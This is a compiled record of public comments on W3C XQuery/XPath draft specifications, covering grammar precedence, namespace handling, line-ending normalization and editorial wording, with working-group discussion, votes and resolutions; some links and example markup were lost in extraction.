is at the same level as FLWORExpr, some, every, TypeswitchExpr, and IfExpr "Precedence Order" table? > I'm pretty sure the > intent was that > > some x in y satisfies a or b > > should parse as > > some x in y satisfies (a or b) Yep. As extra enforcement to this fact, here is the diagnositic results from the test parser. some $x in y satisfies a or b |QueryList | Module | MainModule | Prolog | QueryBody | Expr | QuantifiedExpr | Some some $ | VarName x | In in | PathExpr | StepExpr | NodeTest | NameTest | QName y | Satisfies satisfies | OrExpr or | PathExpr | StepExpr | NodeTest | NameTest | QName a | PathExpr | StepExpr | NodeTest | NameTest | QName b Quiz time: for $x in baz return $x or for $z in yada return $z What does this expression do, in terms of parsing? Answer: it is a syntax error. for $x in baz return for $z in yada return $z or $x What does this expression do, in terms of parsing? Answer: it parses just fine. This is a resolved issue, and I think is goodness, but is a little confusing when looking at precedence issues. -scott Proposal accepted. > c) qt-2003Dec0264-01 : [XQuery] Precedence rules for QuantifiedExpr - > OrExpr - AndExpr > > sues.html#qt-2003Dec0264-01 > > Status: This item is classified incorrectly, it should be Joint, as it > relates to XPath. Deferred to joint F2F (XPath) meeting. Done as well. SAG-XQ-004 Unordered We find that the concept of unordered() as a function, while it has some theoretical justification, is very difficult to explain to users. This is because it doesn't reflect the intended purpose: people call functions when they want to perform some computation on a supplied value, not when they want to tell the compiler to relax the rules on how the input is evaluated. The decision also seems to be inconsistent with the decision to merge "order by" into the FLWOR expression, rather than offering "sort" as a free-standing function/operator as was done previously. We propose that the functionality provided by the unordered() function be offered instead by custom syntax in the FLWOR expressions: essentially by a keyword UNORDERED which would be a syntactic alterative to the ORDER BY clause. Michael Kay for Software AG The current "unordered" is syntax now, not a function. SAG-XQ-003 Run-time access to static namespace context There are a very small number of constructs in the XQuery draft that require run-time knowledge of the static namespace context. We feel that these constructs are undesirable. (a) they create a dependency on the choice of prefixes that is not apparent to the casual reader of a query, leading possibly to failures if the prefixes are changed. (b) they create complexities for implementors and run-time overheads, especially for products that act as compilers rather than interpreters, because the amount of information that needs to be retained in the compiled code is greatly increased. (c) they offer no functionality that cannot be achieved in some other way, just as conveniently. The constructs that require access to the static namespace context are: - computed element and attribute constructors - casting string to QName (and perhaps NOTATION) (the latter also affects XPath) In computed element and attribute constructors, we allow the name of the element or attribute to be evaluated either as a value of type xs:QName, or as a string in the lexical form of a QName. The second option is useful only (a) where the desired name is in no namespace (and there is no default namespace), and (b) where the desired namespace URI is known statically, but the desired local name is computed. I think that we should retain the option to supply the value as a string, but in this case it must be in the form of an NCName, and the resulting node will be in no namespace. For the second case, it is just as easy to construct an xs:QName dynamically by calling the expanded-QName function. For casting a string to a QName, the cast can only succeed if the prefix is one that has been statically declared. In practice this means that the namespace URI must either be known in advance, or must be one of a small set of possible namespace URIs. This scenario is not especially plausible, and when it does occur, it is just as easy to use the expanded-QName function to construct the required QName. In fact the main use case for casting string to QName is where the string is supplied as a literal, for example in the constructor xs:QName("xs:integer"). This is needed for example in an argument of a function call where a value of type xs:QName is required. We could meet this use case either (a) by treating the xs:QName() constructor as a special case, and requiring the argument to be a string literal, or (b) by providing custom syntax for QName-literals. Michael Kay for Software AG. SAG AG we CLOSED this at yesterday's distributed meeting, by adopting a zero-argument collection function The semantics of computed namespace constructors is unclear: 3.7.3.7 Computed Namespace Constructors A constructed namespace node ... binds a namespace prefix represented as NCName in the syntax) to a URI and adds the namespace prefix to the in-scope namespaces for its enclosing element. But the "in-scope namespaces" is part of the *static* context, and constains both prefix *and* URIs: [Definition: In-scope namespaces. This is a set of (prefix, URI) pairs. The in-scope namespaces are used for resolving prefixes used in QNames within the expression.] So how can a run-time namespace expression add to the static in-space namespaces? It might be possible to change the sementics so only the namespace prefixes is part of the static context, while the namespace uri is part of the dynamic context, but that would certainly complicate implementation and probably the semantics Consider: element {$ename} { namespace xx { myns:f($myns:x) }, namespace myns {if $version eq 1 then "" else ""}, attribute xx:type {"myns:invoice"}, $content } This has a forward reference to the myns namespace (is that allowed?), and an function name, a variable name, and an attribute name, all of whose namespaces have to be calculated at run-time. I assume the intention is to not allow that. I suggest a separate concept of "active namespaces" consisting of anmespaces declared in namespace attributes and namespace constructors. This could be part of the dynamic environment, but not the static environment. -- --Per Bothner per@bothner.com we've renovated this part of the document and inviteed the author of the public comment to look at a future WD to confirm that the semantics is clear we've renovated this part of the document and inviteed the author of the public comment to look at a future WD to confirm that the semantics is clear There do not appear to be any rules saying that line endings in XQuery text are normalized. This means that the query: <a> gotcha! </a> will return a different infoset depending on how the text editor used to prepare the query represents line endings, and it will potentially produce a different infoset from the one produced by an XML parser when applied to the same input. I would recommend that line endings within XQuery input text should be normalized in the same way as XML line endings. And to avoid having to change the rules in the future, I would suggest that we use the XML 1.1 rules rather than the XML 1.0 rules. This rule should not apply to XPath; preprocessing of XPath input is the job of the host language. Michael Kay Software AG JR: Do end-of-lines in query get converted to single character as per XML rules? If not, impedes testing. In addition, given that direct constructors look like XML, it would be confusing to have them behave differently. Q: What about such characters in a quoted string? A: That's a quoted string, that's different. If extracted into XML content, then it happens. Q: More specifically, string with CRLF and use that to construct element content? A: When element content gets CRLF it gets converted to new character. MK: No, don't think that's right, I think "behaving like XML" means all CRLF gets normalized as first stage. If you want a CR character you use entity reference. XML does more than normalize element content, also does it to attribute values. MR: No problem with doing that in XML construction, but have a problem of doing that to string literals. That is, if I use existing XML syntax to do XML construction use the XML rules, but if use XQuery functions or value retrieved from DM instance, then shouldn't happen. MK: Not suggesting changing data model values. So: <foo bar=" attrvalue"> <bar /> </foo> would get normalized What about: <foo bar="{ attrvalue}"> <bar /> </foo> Yes: because you get attribute value normalization. AE: Considers this surprising. MK: Considers not doing it surprising. JR: Considers it inappropriate to make results of XQuery OS-dependent. MK: Not also if have CR in there inadvertently, then serializer will have to output that as #xD, which gets messy. Should have to work quite hard to get a CR into your results. MR: If you are concerned about portability, use entity references. MH: Two sets of rules would be confusing. Often flip back from literal element construction to using functions and variables in course of development. Gets confusing to change results. DC: So XML elements vs "inside the curly brace" are the two contexts? Yes. Don't have strong opinion, but see them as sufficiently different to motivate treating them differently. JR: Why would I ever want to get different behaviour on different OSes? MR: Simple. Strings should be looked as from the POV of data model instances and therefore should not be messed with. Similar rules for whitespace. AE: Some languages, e.g. SQL, disallow end of line inside string literals to get away from this problem. JM: Sort of; SQL finesses the issue a bit. DC: What does serialization say? Do newlines get put out in OS conventions? MK: Serializer needs to preserve roundtripping. If you see CR serializer must emit as #xD, under assumption that was only way it got there and to preserve ther roundtripping. Case 1: element construction, do line-ending normalization as per JR's message which uses XML 1.1 rules MR: Wants to stick to XML 1.0 rules MK: Strongly in favour of XML 1.1 rules to prevent transition problems down the road. The rules: 1. the two-character sequence #xD #xA 2. the two-character sequence #xD #x85 3. the single character #x85 4. the single character #x2028 5. any #xD character that is not immediately followed by #xA or #x85. Items 1 and 5 are XML 1.0 rules. MR: Suggest we make it implementation-defined whether you do it as per 1.0 or 1.1, linked to existing implementation-defined decision about handling XML 1.0 or 1.1 DC: Why it is harmful for system implementing XML 1.0 to implement these rules? MR: Need to have different parsing. MK: Argument against #85 is that it means something in Windows proprietary charsets and people get them inadvertently into data when they think they are using ISO-8859-1. Don't think we should redebate pros and cons of XML 1.1 decisions here, however. MR: Disagree. We have already decided to give it an implementation option whether to support XML 1.0 or XML 1.1. MK: I think it is just sacrificing portability for no particular reason. AGREE: that XML 1.0/NS 1.0 vs XML 1.1/NS 1.1 should be a single choice across the document. AGREE: In direct element constructors, end-of-line normalization is performed, either using XML 1.0 or XML 1.1 rules, implementation-defined Case 2; string literals (inside curlies) * no normalization * normalize * ban end-of-lines in string literals DC: Asks for use case for NL in string literal JM: Have text that needs to be formatted exactly as is (e.g proglang code) and wish to express a value that has line endings in it. AGREE: Normalize line endings in source text of XQuery either using XML 1.0 or XML 1.1 rules, implementation-defined as per global switch Clarification: Not for pure XPath, a host language issue, this is just for XQuery. RESOLVED: by agreeing to normalize line endings in the source text of XQuery, using either the XML 1.0 rules or the XML 1.1 rules, the choice of which being implementation-defined per a global switch that selects either XML 1.0/XMLNS 1.0 rules or XML 1.1/XMLNS 1.1 rules. In section 2.4.3, the XQuery language draft says: "It is a static error [err:XP0008] to use an ElementName in an ElementTest if that name is not found in the in-scope element definitions unless a TypeNameOrWildcard is specified." and "It is a static error [err:XP0008] to use an AttributeName in an AttributeTest if that name is not found in the in-scope attribute definitions unless a TypeNameOrWildcard is specified." But the error description for XP0008 reads: "It is a static error if an expression refers to a type name, function name, namespace prefix, or variable name that is not defined in the static context." which does not cover element or attribute names. It seems to me that a new error should be created for these 2 cases. Thanks, Priscilla Don: these two cases have been added ot the (now non-normative) list in the January draft. ACTION A-164-02: qt-2003Nov0249-01 [XQuery] use of XP0008 for element/attribute names Carmelo to respond positively, he's correct, and we're going to change the XQuery document so that it's covered. What is the rationale for the full axis feature? Having these things optional greatly harms interoperability between Xquery systems and between Xquery and Xpath. It would be understandable if it were (say) all the reverse axes that were optional as there are issues supporting those axes in a streaming manner, but since parent:: and << are both non-optional these axes can be supported by an entirely syntactic re-write. Forcing the users to do that is a pain, and one would assume that it is much easier for a system to spot and optimise a specific syntax such as following-sibling::foo than the equivalent expression let $here := . return ../foo[$here << .] I would strongly urge that this feature be dropped and that support for the axes be mandatory. David ________________________________________________________________________ This e-mail has been scanned for all viruses by Star Internet. The service is powered by MessageLabs. For more information on a proactive anti-virus service working around the clock, around the globe, visit: ________________________________________________________________________ Rys: we should keep the status quo, as the extra axes have problems wrt static type inference. Also, some implementation problems (eg for streaming or views). PaulC: initially we made this option as the wg didn't have enough large consensus. Pat: these axes are of use in the document community, like book authors Jason: yes, lot of use cases, eg you have a paragraph and want to cite the whole context (pre and post paragraph). Or, a chapter and you want to get its title. Rys: but that is a minority of use cases, the truth is that these axes are very problematic for typing Dana: but we can already simulate these axes, so what's the point? Massimo: yes; and, the major problem here is interoperability: if these axes are bad, let's put them out; if they are good because some people use the, let's make them mandatory. As it is now we stay in the middle of the road, with no good reasons. Steve: another possible way is to remove parent and root too. This would help providing a rational solution. Massimo: yes, that would at least be a rational position... JimM: yes, that would be very helpful for streaming. Votes (only one preference): status quo: 6 all mandatory: 4 move parent and root to being optional 4 Votes (multiple preferences possible): status quo: 8 all mandatory: 7 move parent: 7 can live with status quo: 9 can't live: 1 abstain: 4 So, status quo prevails. "3.7.3.1 Computed Element Constructors" In the part that describes the processing of the content expression I think it doesn't say exactly what happens if the "adjacent sequence of one or more atomic values" consists of just the empty string. In that case you clearly cannot create a text node, but is an error raised or are such atomic values simply removed? And if they are removed does that happen before or after the concatenation with intermediate spaces? Kind regards, -- Jan Hidders > g) qt-2003Nov0194-01 : [XQuery] empty strings in content expressions > > sues.html#qt-2003Nov0194-01 > > ACTION A-164-03: qt-2003Nov0194-01 : [XQuery] empty strings in content > expressions > Mike Kay to propose rewording of the paragraph "For each > adjacent sequnce of one or more atomic values", also handling the case > text { "" }, so that a sole empty string isn't an error in an element > constructor. > DONE. See: > Rys: <tag>{{'1','','2'}</tag> this gives 1 _ 2 or 1 _ _ 2 ? (here, "_" is the blank). Jonathan: the single blank makes more sense to me. Rys: problems with the static rules and optimizations Rys: pls see my comment in (Jan/0214), cf. issue MS-DM-LC2-066 where I given an alternate way to handle this, by adapting the data model (instead of the XQuery change), so that we won't need MikeK's fix text for this. People note MikeK's text is correct, although redundant if we adopt Rys'. So, people approve MikeK's amendment. And, Srinivas will reply to this public comment. And, Michael Rys will further investigate shaping of its proposal wrt impact on the data model. Why are the union, intersect, and except operations limited to working on sequences of nodes? It seems to me that they are perfectly well defined operations for sequences of arbitrary types, and that these three operators should be declared to work on sequences of item type. If there's no good reason for limiting them to node()*, I would ask that the signatures of these operators be revised to item()* instead. -- Elliotte Rusty Harold Mike Kay: we decided the semantics of these operations on sets of atomic values were to different from the same operations on sets of nodes, and should be separate operators; we then decided that they were easy enough that F&O tells people how to implement them. ACTION A-164-04: qt-2003Nov0188-01 : union, intersect, and except Michael Kay to send a response to say that the WG reviewed the comment and we're not planning to make any changes. Section 4.8 "Variable Declaration" of the XQuery November specification says that: A variable may appear in the expression part of a variable declaration only if that variable is declared or imported earlier in the Prolog than the declaration in which it is used. This is presumably to prevent indeterminacies and cycles. However, section 4.7 "Module Import" says that: Two modules may import each other. So is there anything to prohibit the following? module namespace m1 = "M1"; import module namespace m2 = "M2"; declare variable $m1:v { $m2:v }; module namespace m2 = "M2"; import module namespace m1 = "M1"; declare variable $m2:v { $m1:v } -- --Per Bothner per@bothner.com Per Bothner asked about this in a public comment. This is pushback to Don's response to Per's qt-2003Nov0186-01. Don notes that there can be circularity involving separate compilation of modules, and raises an orthogonal item about this not being possible with a static error. Some discussion of this. Andrew: we have two questions: do we have a valid definition of circularity, and do we need to tie it down further. Can we leave it loose? Jonathan: I'd like to separate this from separate compilation. We don't talk about linking and module loading at all right now. Don: I'm just saying we might not define any specifications that preclude separate compilation. Mary H. and Jerome pointed out that we had more complex text before from Paul Pederson and they weren't sufficient, so we deleted them. Mary: I think the right way to proceed is to stick with what we have, and the only reason to get more specific is because we think implementors won't be abe to make interoperable implementations, but I think in practice this won't be a problem. If difficulties arise, we'll know more clearly. straw poll: Want clearer defintion of circularity: 0.5 Current document is OK: 5 Abstain: 3 Jonathan drafted a response tp Per and will send it; no changes to the documents. Consider the following query: declare namespace}; declare variable $f {<f a="{$e/@a}" xmlns="M"/>}; <result> e: {$e} f: {$f} </result> The output I expect is: <result> e: <e xmlns: f: <f xmlns="M" a="mx"/> </result> Saxon 7.8 emits: <result> e: <e xmlns: f: <f xmlns="M" a=""/> </result> Kawa doesn't handle namespace declaration attributes, but it's next on my list of projects to tackle.. -- --Per Bothner per@bothner.com > e) 2003Nov/0300 belated namespace declaration attributes > MikeK: Per is correct, and we should make that clear Don: Yes, and that's what XML does, and there's no intention that our constructor syntax should diverge in any way from XML AndrewE: see Namespace Declaration, 4.10 *** * ACTION A-TAMPA-20 * on Jonathan Robie * to respond to the public comment on belated namespace declaration attributes * () * saying that we want to be the same as XML, and the order will not be made significant. *** It seems for every direct constructor there is a computed constructor -- except for CDATA sections. Since the WG has allowed CDATA direct constructors at all, there should be full support including computed constructors. I can understand if the CDATA sections were only to ease creating/viewing files that would otherwise require many entities, but since they also may be serialized by implementors it is limiting to not to have this functionality. Proposed rule: CompCdataConstructor ::= "cdata" "{" Expr? "}" --Sarah Jonathan, This is quite satisfactory, thanks. --Sarah On Jan 21, 2004, at 2:04 PM, Jonathan Robie wrote: > > Mary: this text could be a bit more precise, and also say what happens eg when predefined entities are expanded. It'd be good if this boilerplate would be the same both for the language and formal semantics doc and for XSLT. Rys: pls see my text in People agree that mixing Don's 042 message and Rys' 0052 (amendment to Don's point (3)), is the good way to go here. Don will take care. Jonathan will send a reply to this public comment. [approved] [minor editorial] In section 1. Introduction, 2nd paragraph, we have, The Query Working Group has identified a requirement for both a human-readable query syntax and an XML-based query syntax In fact the Requirements document does not talk about a "human-readable" syntax, and does not discuss a concept that the non-XML syntax is intended for human consumption and the XML syntax is intended only for machine use (not human readable). There are people who consider that at least some XML documents - for example, XSLT stylesheets - can be read by humans. I suggest using the terms "XML syntax" and "non-XML syntax". Thanks, Liam -- Liam Quin, W3C XML Activity Lead,7 Section B.2 Operator Mapping There are few typos in the table Binary Operators - the xs:dateTime is named xs:datetime (lowercase T) in the following rows : A + B xs:datetime xdt:yearMonthDuration op:add-yearMonthDuration-to-dateTime(A, B) xs:dateTime A + B xdt:yearMonthDuration xs:datetime op:add-yearMonthDuration-to-dateTime(B, A) xs:dateTime A + B xs:datetime xdt:dayTimeDuration op:add-dayTimeDuration-to-dateTime(A, B) xs:dateTime A + B xdt:dayTimeDuration xs:datetime op:add-dayTimeDuration-to-dateTime(B, A) xs:dateTime A - B xs:datetime xs:datetime fn:subtract-dateTimes-yielding-dayTimeDuration(A, B) xdt:dayTimeDuration A - B xs:datetime xdt:yearMonthDuration op:subtract-yearMonthDuration-from-dateTime(A, B) xs:dateTime A - B xs:datetime xdt:dayTimeDuration op:subtract-dayTimeDuration-from-dateTime(A, B) xs:dateTime3 Section 3.7.3.1 Computed Element Constructors The content expression of a computed element constructor is processed as follows: 1. For each node ... Any sequence of adjacent text nodes in the content sequence is merged into a single text node. Suggest adding the phrase: "by concatenating their contents, with no intervening blanks" to be precise as bullet 4 in "3.7.1.3 Content".2 Section 3.7.2 Other Direct Constructors A CDATA section constructor constructs a text node whose content is the same as the content of the constructor. Since the term "content of CDATA section constructor" was not defined seems better to use more precise wording A CDATA section constructor constructs a text node whose content is the sequence of characters placed between starting and ending delimiters of the CDATA section constructor. Overtaken by events. CData section constructors no longer1 Section 3.7.1 Direct Element Constructors There is a seeming contradiction between definitions of "direct element constructor" If the name, attributes, and content of the element are all constants, the element constructor is based on standard XML notation and is called a direct element constructor. and later In a direct element constructor, curly braces { } delimit enclosed expressions, distinguishing them from literal text. This contradiction could be remedied by modifying the first definition as One form of a direct element constructor is where the name, attributes, and content are all constants in standard XML notation.0 Section 3.5.3 Node comparison. 4. A comparison with the << operator returns true if the first operand node precedes the second operand node in document order; otherwise it returns false. 5. A comparison with the >> operator returns true if the first operand node follows the second operand node in document order; otherwise it returns false. Seems better to use more usual and neutral "left and right operands" instead of "first and second" since the natural ordering while reading not always is "left-to-right".] I recommend rejection of this comment. This sentence is intended as an example of a possible error (dividing by zero). No value is added by referencing a specific error code or message. Adding cross-document references makes the documents fragile and subject to breakage as the target document is8 Section 3.2.2 Predicates. A left-to-right order of applying of predicates is not specified but such order is implied by samples and other definition in the section. Explicit wording about order of applying of predicates would avoid misreading. I recommend rejection of this comment. Text has been revised, and currently says "The value of the step consists of those items that satisfy the predicates." I do not see any value in constraining an implementation to evaluate the predicates from left to right. However, in partial response to this comment, I have inserted an example of a step with multiple predicates.7 Missing anchors on error types (document wide) A few instances referring to errors are missing anchors. To be consistent these should probably be fixed. 3.12.1 Instance Of "dynamic error" in the last sentence isn't an anchor. 4.7 Module Import "static error" in the first paragraph isn't an anchor. 4.8 Variable Declaration "static error" in first paragraph isn't an anchor. 4.8 Variable Declaration "type error" in second paragraph isn't an anchor.6 Section 2.4.4 SequenceType Matching In the definition of the function 'type-matches' it would be helpful to describe some reasons why derivation by extension for unknown actual type is not treated by the spec as base for a positive result of type-matches(ET, AT). A brief description of the reason for the difference would be helpful. Requests a more detailed justification for the "winged horse" rules. Why is derivation by restriction treated differently from extension? Status: No action taken. If the working group wants to add this material, I will need some help in preparing it. [closed with no5 Section 2.4.4 SequenceType Matching In the definition of the function 'type-matches', phrases like type-matches(ET, AT) returns true if: 1.AT is a known type, and is the same as ET, or is derived by one or more steps of restriction or extension from ET, or 2.AT is an unknown type, and an implementation-dependent mechanism is able to determine that AT is derived by restriction from ET. might be better stated as "validly derived from ET according to the XML Schema specification rules" instead of "derived by one or more steps of restriction or extension from ET" I recommend rejection of this comment. The referenced text has been debated extensively. We intend to emphasize the difference between derivation by restriction and by extension.4 Section 3.7.1.5 Type of a Constructed Element Bullet point 2 for the case of "strict" validation. The search for a type definition is described as "the in-scope element declarations are searched for an element declaration whose unique name matches the name of the constructed element." This description is not complete: it should also mention that the presence of "xsi:type" in the constructed element can also be used. Further, that "xsi:type" will take precedence over in-scope element declarations. Overtaken by events. The referenced text no longer exists. We no longer have validation3 Section 3.7.3.2 Computed Attribute Constructors The last paragraph in this section says, "the computed attribute constructor must not be a namespace declaration attribute--that is, its name must not be xmlns or a QName with prefix xmlns." In the Namespace 1.1 Recommendation at [2], the following definition appears in. ] Note that the term prefix is not used. Suggested text: --that is, the QName must not be xmlns and must not begin xmlns:. (N.B. in the rec both "xmlns" and "xmlns:" appear in bold). [2] Overtaken by events. The referenced text no longer exists. The constraint is described in terms of a URI rather than a namespace prefix.1 Section 2 Basics Section 2, third paragraph, says, "some kinds of nodes have typed values, string values, and names, which can be extracted from the node". Although technically this is correct, it would be better to refer to section 2.4.2, where it explains that all (not just some) have typed values and string values, though not all allow access to the values. It can be made more precise by saying something like: "All nodes have typed values and string values, some of which can be extracted from the node. Some kinds of nodes also have names, which can be extracted from the node. For details on how these values are determined and on their availability for various node types please see section 2.4.2." Mostly done. Fixed text to denote that all nodes have typed value and string value. This is an introductory section, not a place for detail. XQuery: editorial Section 2.1 as written can lead to misunderstandings. I think we should reword it a little bit by making clear the following two points, and correcting an error. (a) The information in the static context of an expression is also used for the evaluation phase. (error: as consequence of this, first paragraph in 2.1.1 should mention that this information can also decide if the expression has a dynamic error) (b) Each subexpression of an expression can have a different static and dynamic context during the entire lifetime of that expression: parsing, static analysis and evaluation. Best regards, Dana Requests a statement that static context is used also during the evaluation phase. Status: Recommend to reject, because this is already made clear by paragraph 3 of Section 2.1.2, Dynamic Context. SECTION A.2.2: lexical rules Second para, second sentence: "Each table corresponds to a lexical state and shows that the tokens listed are recognized when in that state." It would help to state that any unlisted tokens are lexical errors. For the reader who misses this sentence entirely, it might help if each table had a last row whose "Pattern" is "any other token" and whose "Transition to state" was "lexical error". - Steve B. We looked at Scott's modified text. SECTION 2.1.1: Static context The definition of "default collation" is followed immediately by the sentence "for exceptions to this rule...". To me, a definition should be something that has no exceptions. One way to fix this would be to move the exceptions into the definition. Thus, "Default collation. This collation is used ... except as specified in 4.11 Default Collation Declaration." - Steve B. Status: Overtaken by events. Referenced sentence no longer exists. SECTION 3.7.1.4: whitespace in element content It would also be useful to show examples with xml:space attributes. The last example looks like a good starting point. <a>{" "}</a> creates <a> </a> even if xmlspace is strip. Thus with "declare xmlspace strip", <a xml: </a> creates <a xml:{" "}</a> creates <a xml: </a> in spite of the xml:space='default' attribute. The xml:space attribute is advice to the application that ultimately consumes the element, whereas xmlspace is a directive (stronger than advice) to the XQuery engine constructing the element. The user must use both in order to get any particular desired result. - Steve B. Status: Recommend to reject. We have decided that xml:space is treated as an ordinary attribute that does not affect the content of the constructed node. The document states this rule. I do not think that we need examples to illustrate this lack of effect. SECTION A.2.1: white space rules Whereas: a) the whitespace rules for XQuery are so complex (What is "ignorable whitespace"? How will the user learn that he can put a comment between a $ and a QName, but not between "for" and "$"? What is the difference between "whitespace: explicit" and "whitespace: significant"? Do the XQuery whitespace rules govern EBNF's that are quoted from other documents that don't have XQuery conventions?) b) there are different whitespace rules for so many different cases (in direct element constructors not nested within an enclosed expression; in other kinds of direct constructors; in comments, pragmas, and must-understand extensions; in keyword phrases that are necessary for disambiguation; in all other contexts -- I think I got them all, but I am not sure). My suggestion is that you give up on implicit whitespace rules in the EBNF, and go with totally explicit whitespace in every EBNF. You already have S to represent spaces, tabs and newlines. To that you can add other symbols. For example IWS might stand for what you call "ignorable whitespace". I think IWS ::= S | Pragma | MUExtension | ExprComment. Now given S and IWS, you can clearly write ForClause ::= "for" S? "$" IWS? Varname IWS? TypeDeclaration? ... etc., which clearly shows that a comment is not allowed between "for" and "$". You can also clear up the nesting possibilities of comments, pragmas and must-understand extensions. E.g., is it Pragma ::= "(::" S? "pragma" S? QName S? ... or is it Pragma ::= "(::" IWS? "pragma" IWS? QName IWS? ... - Steve B. Proposal accepted. See. SECTION 2.6.2: static typing feature Second sentence: "However, non-type-related static errors must be detected and raised during the static analysis phase." It is unclear whether this applies only to implementations that support the static typing feature, or to all implementations. I think you mean the latter (if not, this sentence belongs within the Definition). In that case, it would read better as: "All XQuery implementations must detect and raise non-type-related static errors during the static analysis phase." - Steve B. [unclear when all implementations must raise non-type-related static errors] Status: Overtaken by events. Section has been rewritten and the referenced sentence no longer exists. SECTION 2.6.2: static typing feature First sentence: "[Definition: An XQuery implementation that does not support the Static Typing Feature is not required to raise type errors during the static analysis phase.]" This would read better if stated positively: "An XQuery implementation that supports the Static Typing Feature is required to raise type errors during the static analysis phase." - Steve B. Status: Accepted and implemented. SECTION A.1.1: grammar notes grammar-note: xml-version It says "The general rules for [XML 1.1] vs. [XML 1.0], as described in A.2 Lexical structure, should be applied...". The word "vs." is confusing. When I first read this, I thought you meant "The general rules for [XML 1.1], and not the general rules for [XML 1.0], should be applied...". However, consulting section A.2, I think what you mean is "It is implementation-defined whether the general rules for [XML 1.0] or [XML 1.1] are applied, as described in section A.2...". - Steve B. Status: Accepted and implemented. SECTION A.2.1: white space rules It would be helpful to state in Rule "ws: explicit" that comments, pragmas and must-know extensions are not whitespace, as the term is understood for any rule marked with this annotation. The only thing that is meant by whitespace for the sake of this rule is S, which does not include comments, pragmas or must-know extensions. - Steve B. We looked at Scott's modified text. Don: What about "1(: hello :)2"? Treat it as 12 in element constructor? Scott: yes, in element constructor, not in other contexts such as let Accepted. We looked at Scott's modified text. SECTION 3.7.3.1: computed element constructor The sentence after rule [100] says "The name expression of a computed element expression is processed as follows...". Just looking at this section, it seems that the term "name expression" is not defined. Actually, it is defined, in section 3.7.3 "Computed constructors". Providing a hot link to the definition of name expression would be useful. Likewise for content expression later in this section, and similarly for the other kinds of computed constructors. - Steve B. Status: Accepted and implemented. SECTION A.1: EBNF First para, last sentence: "This appendix should be regarded as normative...". I think it is better to avoid the word "should". Just say "This appendix is normative...". - Steve B. See [435] RESOLUTION: adopted ACTION A-SJ04-29 Don to change "should be regarded as" to "is" [[accepted]] SECTION 3.7.1.4: whitespace in element content This section uses the phrase "element content", which is a term defined in XML 1.0 section 3.2.1 "element content" as "[Definition: An element type has element content when elements of that type must contain only child elements (no character data), optionally separated by white space (characters matching the nonterminal S.]". The XQuery working draft, on the other hand, has no definition for "element content", either explicitly or by reference to XML 1.0. It seems in the present section that your use of "element content" is not the same as the definition in XML 1.0. For one thing, XML 1.0 uses the phrase "element content" only with reference to validated XML, whereas you use it only with reference to the result of a direct element constructor, which is unvalidated. I think you mean "the content of an element" whereas XML 1.0 means "content which consists solely of elements and whitespace". I grant that your use of "element content" is probably closer to ordinary English usage than XML 1.0's, but having two conflicting meanings for the same phrase in these two specifications will be very confusing. There will be dialogs in which one person means the XML 1.0 meaning and the other person means the XQuery meaning, and the two people will have to go through a lot of discussion before they realize they are not using the words to mean the same thing. There will be people who misunderstand the XQuery specification because of prior familiarity with XML 1.0, and vice versa. Since XML 1.0 is already a recommendation, I suggest you find some other phrase, such as "content of an element", and avoid "element content". - Steve B. Requests that we stop using the common English term "element content" because its meaning has been pre-empted by XML 1.0. Status: Accepted and implemented. SECTION 3.7.1.2: namespace declaration attributes It would be better if the example showed both ways to get a namespace declared for an element constructor, using both the prolog and a namespace declaration attribute, like this: declare namespace <height> <metric:meters>3</metric:meters> </height> <width> <english:feet>6</english:feet> </width> <depth> <english:inches>18</english:inches> </depth> </box> - Steve B. Suggests that an example, intended to illustrate namespace declaration attributes, also illustrate prolog namespace declarations at the same time. Status: Recommend to reject. This example illustrates the intended feature. Other features are described and illustrated elsewhere. SECTION 3.7.1.1: Attributes Second para, last setence: "All the attribute nodes ... must have distinct names". More precisely, they must have distinct expanded QNames, as explained in section 5.3 of "Namespaces in XML" or section 6.3 of "Namespaces in XML 1.1". - Steve B. Status: Accepted and implemented. SECTION 3.1.6: Comments This section appears to be misplaced, since it says that "Comments may be used anywhere ignorable whitespace is allowed." I assume this means they can be used in the prolog as well as in expressions. In that case, this section is broader in scope than just expressions, so it does not belong as a subsection of section 3 "Expressions" or (worse) 3.1 "Primary Expressions". On the other hand, direct element constructors are part of the expression syntax, yet ExprComments are not allowed in them. Thus the connection between ExprComments and expressions is a non-connection in both directions: you can have comments outside expressions, and sometimes you can't have comments within expressions. - Steve B. Don will change the status quo to make the explanation better. Some discussion of whether or not PW's proposal addresses this issue. ScB: This issue is where do we discuss comments in the document? DC: I'm abstaining on how comments should be treated in the grammar, but I am in sympathy with this comment. Right now comments are documented as a sub-category of primary expression. Really they're broader than that. I'm willing to do that. JR: There are productions for comments and they're part of the grammar. PC: This item is clearly only about where comments are described. Accepted: Don will change the status quo to make the explanation better. SECTION 3: Expressions Third para: "a query may consist..." The term "query" is not defined. Perhaps this sentence is (part of) the definition. But in that case "may" seems like the wrong word. The definition of "query" might be something like "[Definition: a query consists of one or more modules.]" - Steve B. Requests a definition of the term "query". Status: Accepted and implemented. SECTION. Requests a better definition for must-understand extensions. Status: Overtaken by events. Must-understand extensions no longer exist. SECTION 2.6.5: pragmas Rule [1] "Pragma" is followed by a C-style comment /* gn:parens */. I think this is the first rule in the specification with such a comment. What does this mean? I expected to find a section near the beginning of the specification, possibly called "Conventions" or the like, to explain your metalanguage. I see that XML 1.0 did something similar with their VC and WFC notes, which was never explained as a convention either, but at least they put the specification of the validity constraint or well-formedness constraint shortly after the occurrence of the VC or WFC note. In your case, it turns out that you have placed all the /* gn: ... */ in one place, in Appendix A.1.1. "Grammar notes". Similarly the /* ws:... */ comments are collected in Appendix A.2.1 "White space rules". It would help the reader to have a conventions section near the beginning to explain this convention. Perhaps your reply is that you already have hot links on these things. That is fine for people reading the document on the web, but not everyone wants to read the spec in a browser. The problem with browsers is that it is difficult to flip back and forth between sections, which is fairly easily done in hardcopy with sticky notes, or just a finger or pen stuck between pages. Hot links do not justify never explaining your conventions. - Steve B. excerpt: Andrew: could these comments be filtered out altogether and be put in the summary instead? Jonathan: everything must be completely specified and be as clear as possible. I'd rather give the editors a chance to play with this than give a specific solution. Scott: I tend to like Andrew's idea, as it unclutters the exposition a little bit. Don: I'm pretty neutral on this Proposals: (1) amend the text up front to explain what the comments are (2) put the comments only in the section that's already prefaced with a comment that explains them. ACTION on Don and Scott to choose and implement one of these. Proposals: (1) amend the text up front to explain what the comments are (2) put the comments only in the section that's already prefaced with a comment that explains them. ACTION A-SJ04-28 on Don and Scott to choose and implement one of these. [[accepted]] SECTION 2.4.4.3 : Matching an ElementTest and an Element Node List item 2)b) says "...if the given element node has the nilled property...". This condition is always true; every element node has a nilled property (though the value of the nilled property may be false). What is meant is "...if the nilled property of the element node is true...". - Steve B. Requests change in semantics of nilled property in element tests. Status: 